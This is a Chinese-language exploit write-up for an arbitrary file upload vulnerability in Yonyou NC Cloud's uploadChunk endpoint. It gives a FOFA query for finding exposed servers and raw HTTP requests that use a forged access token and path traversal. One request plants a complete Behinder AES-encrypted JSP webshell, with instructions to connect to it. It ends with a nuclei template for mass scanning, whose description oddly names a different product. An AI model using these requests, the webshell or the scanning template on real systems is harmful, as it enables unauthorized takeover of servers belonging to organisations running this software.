漏洞简介用友NC Cloud uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。
漏洞复现fofa语法:app="用友-NC-Cloud"登录页面如下:
POC:
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1Host: Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ--024ff46f71634a1c9bf8ec5820c26fa9Content-Disposition: form-data; name="file"; filename="test.txt"This website has an arbitrary file upload vulnerability--024ff46f71634a1c9bf8ec5820c26fa9--
上传木马文件,使用冰蝎中自带的shell.jspx木马。上传成功后直接用冰蝎连接,不要使用浏览器访问木马文件。
POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1Host: Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQContent-Length: 806--024ff46f71634a1c9bf8ec5820c26fa9Content-Disposition: form-data; name="file"; filename="vuln.jspx" class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);--024ff46f71634a1c9bf8ec5820c26fa9--使用冰蝎进行连接
nuclei批量yaml文件id: yonyou_NCCloud_uploadChunk_uploadinfo: name: 用友NC Cloud uploadChunk任意文件上传漏洞 author: afan severity: critical tags: yonyou,changjietong,bjxsec,yonyouoa description: fofaapp="畅捷通-TPlus"variables: file_name: "{{to_lower(rand_text_alpha(8))}}.txt" file_content: "{{to_lower(rand_text_alpha(26))}}"requests: - raw: - |POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1Host: {{Hostname}}Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQContent-Length: 153--024ff46f71634a1c9bf8ec5820c26fa9Content-Disposition: form-data; name="file"; filename="{{file_name}}"{{file_content}}--024ff46f71634a1c9bf8ec5820c26fa9--- |GET /nccloud/{{file_name}} HTTP/1.1Host: {{Hostname}}req-condition: truematchers: - type: wordwords: - "{{file_content}}"part: body